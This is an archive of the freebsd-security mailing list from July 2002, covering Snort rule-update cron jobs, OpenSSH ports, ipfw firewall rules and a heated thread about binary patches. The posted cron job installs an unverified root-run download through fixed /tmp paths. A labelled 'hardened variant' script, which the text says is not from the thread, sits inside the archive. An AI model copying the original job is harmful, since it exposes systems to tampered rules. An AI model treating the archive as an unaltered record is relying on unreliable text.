Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15: 1:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8240337B400 for ; Mon, 1 Jul 2002 15:01:38 -0700 (PDT) Received: from web10108.mail.yahoo.com (web10108.mail.yahoo.com [216.136.130.58]) by mx1.FreeBSD.org (Postfix) with SMTP id 4BB7E43E09 for ; Mon, 1 Jul 2002 15:01:38 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701220138.66193.qmail@web10108.mail.yahoo.com> Received: from [68.5.49.41] by web10108.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 15:01:38 PDT Date: Mon, 1 Jul 2002 15:01:38 -0700 (PDT) From: twig les Subject: Re: instant snort sigs for new vulnerabilites To: Steve McGhee , snort-users@lists.sourceforge.net Cc: freebsd-security@freebsd.org In-Reply-To: <3D20C250.1020603@lmri.ucsb.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's a good idea for a quick script that I should have had done months ago. As soon as I put out the lastest mystery fire I'll see if I can get a reasonable little Lynx-based cronjob. --- Steve McGhee wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > with all the fuss lately over the new apache worm, > etc, id like to know > if my machine is getting hit (its patched, just > being curious). i know > about mod_blowchunks, but im looking for something > more general.. > > it seems to me that snort could see these attacks > pretty easily. > > is there a tool/method out there that will retrieve > the *latest* snort > signatures automatically? 
for those of us not > running snort via CVS, id > like a way to do something like cvsup, but _only_ > update my ruleset > every night or whatever. > > i cc: the freebsd team as this might be a cool > (simple) port. (something > like /usr/ports/security/snort-signatures) > > this could be helpful to people who are just > curious, or maybe could > provide some good numbers to shock lazy sysadmins > into actually patching > their machines. > > > ..of course, this is all assuming there's someone > out there writing > signatures ;) > > - -- > - -steve > > ~ > .......................................................... > ~ Steve McGhee > ~ Systems Administrator > ~ Linguistic Minority Research Institute > ~ UC Santa Barbara > ~ phone: (805)893-2683 > ~ email: stevem@lmri.ucsb.edu > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.5.8 > Comment: Using PGP with Mozilla - > http://enigmail.mozdev.org > > iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns > BcxrxnUpvAJK3Sczy5nY4Ir5 > =9LCO > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! 
- Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15:26:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F38737B400 for ; Mon, 1 Jul 2002 15:26:26 -0700 (PDT) Received: from killedkenny.net (12-225-232-73.client.attbi.com [12.225.232.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id CE3AF43E13 for ; Mon, 1 Jul 2002 15:26:25 -0700 (PDT) (envelope-from blacksun@killedkenny.net) Received: from localhost (blacksun@localhost) by killedkenny.net (8.11.3/8.11.3) with ESMTP id g61MV2B38123 for ; Mon, 1 Jul 2002 15:31:03 -0700 (PDT) (envelope-from blacksun@killedkenny.net) Date: Mon, 1 Jul 2002 15:31:02 -0700 (PDT) From: Maurice Sprague To: freebsd-security@freebsd.org Subject: unsubscribe Message-ID: <20020701153052.P38121-100000@killedkenny.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15:28:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10AD837B406 for ; Mon, 1 Jul 2002 15:28:46 -0700 (PDT) Received: from web10103.mail.yahoo.com (web10103.mail.yahoo.com [216.136.130.53]) by mx1.FreeBSD.org (Postfix) with SMTP id D997543E0A for ; Mon, 1 Jul 2002 15:28:45 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701222845.67617.qmail@web10103.mail.yahoo.com> Received: from [68.5.49.41] by web10103.mail.yahoo.com via HTTP; Mon, 
01 Jul 2002 15:28:45 PDT Date: Mon, 1 Jul 2002 15:28:45 -0700 (PDT) From: twig les Subject: Re: unsubscribe To: freebsd-security@freebsd.org In-Reply-To: <20020701153052.P38121-100000@killedkenny.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Was it something I said? --- Maurice Sprague wrote: > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 16:36:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C771B37B400 for ; Mon, 1 Jul 2002 16:36:22 -0700 (PDT) Received: from 66-162-33-178.gen.twtelecom.net (66-162-33-178.gen.twtelecom.net [66.162.33.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id 611D643E0A for ; Mon, 1 Jul 2002 16:36:22 -0700 (PDT) (envelope-from sfrancis@expertcity.com) Received: from [10.4.2.41] (helo=expertcity.com) by 66-162-33-178.gen.twtelecom.net with esmtp (Exim 3.22 #4) id 17PAiT-0002OM-00; Mon, 01 Jul 2002 16:36:21 -0700 Message-ID: <3D20E7F7.6040807@expertcity.com> Date: Mon, 01 Jul 2002 16:38:31 -0700 From: Steve Francis User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: twig les Cc: Steve McGhee , 
snort-users@lists.sourceforge.net, freebsd-security@freebsd.org Subject: Re: instant snort sigs for new vulnerabilites References: <20020701220138.66193.qmail@web10108.mail.yahoo.com> Content-Type: multipart/alternative; boundary="------------010201040502090703020009" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

--------------010201040502090703020009 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit

I have this called from cron:

#Update rules
cd /tmp
rm -rf rules
/usr/local/bin/wget http://www.snort.org/downloads/snortrules.tar.gz
tar -xzf snortrules.tar.gz
rm snortrules.tar*
mv /tmp/rules/*.rules /usr/local/share/snort

# Restart snort (doing it with stop/start restarts the snort-NNNN@NNNN.log
# file).
        /usr/local/etc/rc.d/snort.sh stop >/dev/null
        if [ -d $ARCHIVE ]; then
                cd $SNORTLOG
                mv *-snort.log $ARCHIVE
        fi
        /usr/local/etc/rc.d/snort.sh start >/dev/null

twig les wrote:

>That's a good idea for a quick script that I should
>have had done months ago. As soon as I put out the
>latest mystery fire I'll see if I can get a
>reasonable little Lynx-based cronjob.
>
>
>--- Steve McGhee wrote:
>
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>
>>with all the fuss lately over the new apache worm,
>>etc, id like to know
>>if my machine is getting hit (its patched, just
>>being curious). i know
>>about mod_blowchunks, but im looking for something
>>more general..
>>
>>it seems to me that snort could see these attacks
>>pretty easily.
>>
>>is there a tool/method out there that will retrieve
>>the *latest* snort
>>signatures automatically? for those of us not
>>running snort via CVS, id
>>like a way to do something like cvsup, but _only_
>>update my ruleset
>>every night or whatever.
>>
>>i cc: the freebsd team as this might be a cool
>>(simple) port. (something
>>like /usr/ports/security/snort-signatures)
>>
>>this could be helpful to people who are just
>>curious, or maybe could
>>provide some good numbers to shock lazy sysadmins
>>into actually patching
>>their machines.
>>
>>
>>..of course, this is all assuming there's someone
>>out there writing
>>signatures ;)
>>
>>- --
>>- -steve
>>
>>~
>>..........................................................
>>~ Steve McGhee
>>~ Systems Administrator
>>~ Linguistic Minority Research Institute
>>~ UC Santa Barbara
>>~ phone: (805)893-2683
>>~ email: stevem@lmri.ucsb.edu
>>
>>-----BEGIN PGP SIGNATURE-----
>>Version: PGP 6.5.8
>>Comment: Using PGP with Mozilla -
>>http://enigmail.mozdev.org
>>
>>
>>iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns
>>BcxrxnUpvAJK3Sczy5nY4Ir5
>>=9LCO
>>-----END PGP SIGNATURE-----
>>
>
>
>=====
>-----------------------------------------------------------
>Only fools have all the answers.
>-----------------------------------------------------------
>
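A hardened variant of the rule-update step in the cron job above, as an added example that is not part of the original post. The posted job runs as root from cron, works in fixed paths under the shared /tmp, and installs whatever the plain-HTTP download returns; this version checks the tarball against a digest, stages it in a private directory, and installs only regular *.rules files. The function names and the availability of a trusted SHA-256 digest obtained out of band are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): verify and stage a Snort rules tarball
# before installing it. Function names and the trusted digest are assumptions.

# Print the SHA-256 of a file with whichever tool this system provides.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v sha256 >/dev/null 2>&1; then
        sha256 -q "$1"                       # FreeBSD base system
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Accept only relative member names with no ".." path component.
member_is_safe() {
    case "$1" in
        /*|..|../*|*/..|*/../*) return 1 ;;
        *) return 0 ;;
    esac
}

# install_rules TARBALL EXPECTED_SHA256 DEST_DIR
# Returns 0 only if the digest matched and at least one rule file was installed.
install_rules() {
    tarball=$1; expected=$2; dest=$3; count=0
    [ -f "$tarball" ] && [ -n "$expected" ] || return 1

    # 1. Integrity: compare against a digest obtained out of band.
    actual=$(sha256_of "$tarball") || return 1
    if [ "$actual" != "$expected" ]; then
        echo "install_rules: digest mismatch, keeping current rules" >&2
        return 1
    fi

    # 2. Refuse archives whose member names could escape the staging directory.
    if ! tar -tzf "$tarball" | while IFS= read -r member; do
            member_is_safe "$member" || exit 1
        done
    then
        echo "install_rules: unsafe member name in archive" >&2
        return 1
    fi

    # 3. Stage in a private, unpredictable directory (mode 0700), not /tmp/rules.
    stage=$(mktemp -d "${TMPDIR:-/tmp}/snortrules.XXXXXX") || return 1
    if ! tar -xzf "$tarball" -C "$stage"; then
        rm -rf "$stage"
        return 1
    fi

    # 4. Install regular *.rules files only; write to a temporary name and
    #    rename so a running sensor never reads a half-written file.
    for f in "$stage"/rules/*.rules; do
        if [ -L "$f" ] || [ ! -f "$f" ]; then
            continue                          # symlink, special file, or no match
        fi
        name=$(basename "$f")
        if cp "$f" "$dest/.$name.new" && mv "$dest/.$name.new" "$dest/$name"; then
            count=$((count + 1))
        else
            rm -rf "$stage"
            return 1
        fi
    done

    rm -rf "$stage"
    [ "$count" -gt 0 ]
}

# Usage from cron (download location and TRUSTED_SHA256 are hypothetical):
#   install_rules /path/to/snortrules.tar.gz "$TRUSTED_SHA256" /usr/local/share/snort \
#       && /usr/local/etc/rc.d/snort.sh stop >/dev/null \
#       && /usr/local/etc/rc.d/snort.sh start >/dev/null
```

Restarting snort only when install_rules succeeds keeps the previous ruleset in place after a failed or tampered download.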

--------------010201040502090703020009-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:22:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D22037B400 for ; Mon, 1 Jul 2002 17:22:46 -0700 (PDT) Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 69A5843E26 for ; Mon, 1 Jul 2002 17:22:45 -0700 (PDT) (envelope-from minter@bunning.skiltech.com) Received: (from root@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QKgfS57805; Wed, 26 Jun 2002 16:42:41 -0400 (EDT) (envelope-from minter) Received: (from minter@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QKgdg57796; Wed, 26 Jun 2002 16:42:39 -0400 (EDT) (envelope-from minter) Date: Wed, 26 Jun 2002 16:42:39 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: Brett Glass Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <4.3.2.7.2.20020626143023.022716c0@localhost> Message-ID: <20020626164206.P57680-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brett Glass wrote: > Worse than that. Every package or port must be reinstalled > or rebuilt too. Ditto everything you've built from source. > Basically, the entire system must be ripped up by the roots. > > This is scary. I wouldn't think that ports or packages that don't statically link a resolver would need to be recompiled. 
--Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:34:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 04A4E37B400 for ; Mon, 1 Jul 2002 17:34:32 -0700 (PDT) Received: from inigo.digitaldeck.com (twindolphin.digitaldeck.com [66.124.240.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7E41043E09 for ; Mon, 1 Jul 2002 17:34:31 -0700 (PDT) (envelope-from chris@digitaldeck.com) Received: from IVANOVA2K (ivanova-2k.office-ca1.digitaldeck.com [192.168.1.133]) by inigo.digitaldeck.com (8.11.6/8.11.3) with SMTP id g620YVu61296 for ; Mon, 1 Jul 2002 17:34:31 -0700 (PDT) (envelope-from chris@digitaldeck.com) From: "Chris McCluskey" To: Subject: FW: Which SSH now (and when)? Date: Mon, 1 Jul 2002 17:35:08 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I didn't get any response from -questions, so I thought I would try here. I know some are stupid, but keep with me ok?! 
___

I was hoping that everyone out there can clarify a couple questions (and/or possibly false statements) I have regarding SSH.

FreeBSD (4.5) SSH in the system source is (or was) built from OpenSSH3.3?

FreeBSD (4.5) ships with the SSH ports (ssh and ssh2) from ssh.com?

To stay consistent with the FreeBSD project then, it would be a good idea to build out of the openssh or openssh-portable ports instead of the ssh/ssh2 ports -- using the portable port if and only if PAM support is needed?

Have the security issues recently released from ISS and OpenSSH been fixed, and have the ports in openssh and openssh-portable (both OpenSSH 3.4) been initially tested and found to be ok in the following areas -- 1) ChallengeResponseAuth is now fixed, 2) key exchanges with previously created DSA or RSA keys are now working currently, and 3) PRIVSEP is now enabled by default in both openssh ports?

Are there any issues that should keep me from using the ssh.com ports (besides the possible security issues with SSH1 on a protocol level) and the lack of a PRIVSEP mechanism?

Thanks.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 17:45:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 143CF37B400 for ; Mon, 1 Jul 2002 17:45:41 -0700 (PDT) Received: from mail2.home.nl (mail2.home.nl [213.51.129.226]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2F8BB43E0A for ; Mon, 1 Jul 2002 17:45:40 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from winxp ([217.120.146.224]) by mail2.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020702004740.BZCM27206.mail2.home.nl@winxp>; Tue, 2 Jul 2002 02:47:40 +0200 Message-ID: <007301c22161$c9c76ef0$0200a8c0@winxp> From: "nascar24" To: "Gerhard Sittig" , References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> Subject: Re: Making a firewall more closed Date: Tue, 2 Jul 2002 02:45:37 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "nascar24" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

What I mean is that I want to grant access to the internet. But only to ports I 'trust', like 80,21,22 etc. But when I make a rule like:

add 550 allow ip from me to any 80,21,22

I cannot access a website, that puzzles me.

> On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote:
> >
> > I've been using the IPFW for some time now but I have one problem. I have
> > closed my firewall (I guess) from attacks from the outside world. But I am
> > open to attacks from within, i.e: trojan horses etc.
> >
> > Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I
> > change them to 21,22,80,8080 I cannot connect to any websites or FTP sites.
> >
> > [ filter rule set snipped ]
> >
> > I hope you can help, thanks in advance.
>
> What exactly is your question?
>
> If you want to "less trust the inside", close the inner interface
> as much as you did with the outside.
>
> If you are looking for hints on how to generally improve your
> filter rules I strongly suggest you have a look at the ipfilter
> HowTo -- even if you don't use ipf: this document talks about
> the basics, too, plus derives / designs a rule set from bottom
> up. Visit www.ipfilter.org or look at the misc/26763 PR (Cyrille
> Lefevre, "installing ipfilter sample files to share/examples").
>
>
> virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
> Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
> --
> If you don't understand or are scared by any of the above
> ask your parents or an adult to help you.
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 17:53:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2C2D637B400 for ; Mon, 1 Jul 2002 17:53:11 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CAED43E0A for ; Mon, 1 Jul 2002 17:53:10 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g620qxt04336; Mon, 1 Jul 2002 18:52:59 -0600 (MDT) Message-ID: <3D20F94D.3B2820A9@fpsn.net> Date: Mon, 01 Jul 2002 18:52:29 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: nascar24 Cc: Gerhard Sittig , security@FreeBSD.ORG Subject: Re: Making a firewall more closed References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> <007301c22161$c9c76ef0$0200a8c0@winxp> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Do you have a rule in place which precludes 550 ?

nascar24 wrote:
>
> What I mean is that I want to grant access to the internet. But only to ports
> I 'trust', like 80,21,22 etc. But when I make a rule like:
>
> add 550 allow ip from me to any 80,21,22
>
> I cannot access a website, that puzzles me.
>
> > On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote:
> > >
> > > I've been using the IPFW for some time now but I have one problem. I have
> > > closed my firewall (I guess) from attacks from the outside world. But I am
> > > open to attacks from within, i.e: trojan horses etc.
> > >
> > > Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I
> > > change them to 21,22,80,8080 I cannot connect to any websites or FTP sites.
> > >
> > > [ filter rule set snipped ]
> > >
> > > I hope you can help, thanks in advance.
> >
> > What exactly is your question?
> >
> > If you want to "less trust the inside", close the inner interface
> > as much as you did with the outside.
> >
> > If you are looking for hints on how to generally improve your
> > filter rules I strongly suggest you have a look at the ipfilter
> > HowTo -- even if you don't use ipf: this document talks about
> > the basics, too, plus derives / designs a rule set from bottom
> > up. Visit www.ipfilter.org or look at the misc/26763 PR (Cyrille
> > Lefevre, "installing ipfilter sample files to share/examples").
> >
> >
> > virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
> > Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
> > --
> > If you don't understand or are scared by any of the above
> > ask your parents or an adult to help you.
> >

--
Colin Faber
(303) 736-5160
fpsn.net, Inc.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:54:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B175937B400 for ; Mon, 1 Jul 2002 17:54:42 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 39E9643E3B for ; Mon, 1 Jul 2002 17:54:42 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 23A354A9C; Mon, 1 Jul 2002 19:54:41 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g620sZ111570; Mon, 1 Jul 2002 19:54:35 -0500 (CDT) (envelope-from hawkeyd) Date: Mon, 1 Jul 2002 19:54:35 -0500 (CDT) Message-Id: <200207020054.g620sZ111570@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net> In-Reply-To: <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net> From: hawkeyd@visi.com (D J Hawkey Jr) Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. X-Original-Newsgroups: sol.lists.freebsd.security To: brett@lariat.org, freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net>, brett@lariat.org writes: > >>Please note that I have *not* asked for a binary update. >>I don't want to get flamed the way Brett does... > > ...for asking something reasonable? ;-) > > Seriously: Please do ask. 
If we do not have up-to-date binary
> packages, a large percentage of the new installs of FreeBSD
> (both network installs and those from CD-ROM) will be vulnerable
> from the start, even though the holes have long been identified.
> This is not only unethical but also terrible for FreeBSD's
> reputation.

Again with the "I need this from y'all 'cuz I'm too lame or lazy to do it myself, and I'm committed to countless customers with a solution of my own making that I can't support.". And now you're going so far as to call The Project "unethical". I gotta wonder if those same customers aren't going to refer to you with the same word pretty soon.

You got 'em into this jam; you get 'em out.

> Already, the Apache/FreeBSD worm is making the rounds. Why
> allow new installs to be vulnerable?

Jiminy Crickets, man! Get off your pedestal, roll up your sleeves, and get on with it. You MUST have a lot of work to do, what with spending all this time pissing and moaning about how others won't do it for you.

> --Brett

Ya know, Brett, in the time it takes for you to let one thread of yours die, I can update two disparate networks with two patches. And I have nowhere's near the expertise you so obviously must have.

I won't be re-visiting this thread.

Dave

--
Windows: "Where do you want to go today?"
Linux: "Where do you want to go tomorrow?"
FreeBSD: "Are you guys coming, or what?"
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 18: 3:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D9C8937B43A for ; Mon, 1 Jul 2002 18:03:14 -0700 (PDT) Received: from idealab.com (il-la.la.idealab.com [63.251.211.5]) by mx1.FreeBSD.org (Postfix) with SMTP id 5DB1D43E13 for ; Mon, 1 Jul 2002 18:03:14 -0700 (PDT) (envelope-from pat@idealab.com) Received: (qmail 28893 invoked by uid 1085); 2 Jul 2002 01:03:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Jul 2002 01:03:08 -0000 Date: Mon, 1 Jul 2002 18:03:08 -0700 (PDT) From: Patrick Cahalan X-X-Sender: To: Subject: I'll volunteer Message-ID: <20020701180053.B96837-100000@erie.pas.lab> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To be the post moderator if it will get all of the non-security (ie, you suck! No, you suck!) emails off of this list. Of course, you'd have to then wait for me to wallow through the crud before the list got posted, but it might be worth it, both in terms of my effort and the delay in getting the mail out. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 18: 5:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B674F37B400 for ; Mon, 1 Jul 2002 18:05:20 -0700 (PDT) Received: from mail3.home.nl (mail3.home.nl [213.51.129.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id F2D3A43E09 for ; Mon, 1 Jul 2002 18:05:19 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from winxp ([217.120.146.224]) by mail3.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020702010259.DOHB28540.mail3.home.nl@winxp>; Tue, 2 Jul 2002 03:02:59 +0200 Message-ID: <008d01c22164$89107ac0$0200a8c0@winxp> From: "nascar24" To: "Ramsey G. Brenner" , References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> <007301c22161$c9c76ef0$0200a8c0@winxp> <200207011859.23581.rgbrenner@myrealbox.com> Subject: Re: Making a firewall more closed Date: Tue, 2 Jul 2002 03:05:16 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

This is my current ruleset:

# allow loopback traffic
add 100 allow ip from any to any via lo0

# protect loopback address
add 200 deny log ip from 127.0.0.1 to any
add 249 deny log ip from any to 127.0.0.1

# block spoofs
add 400 deny log ip from me to any in via ed0

# enable NATD
add 425 divert 8668 ip from any to any via ed0

# check dynamic rules
add 450 check-state

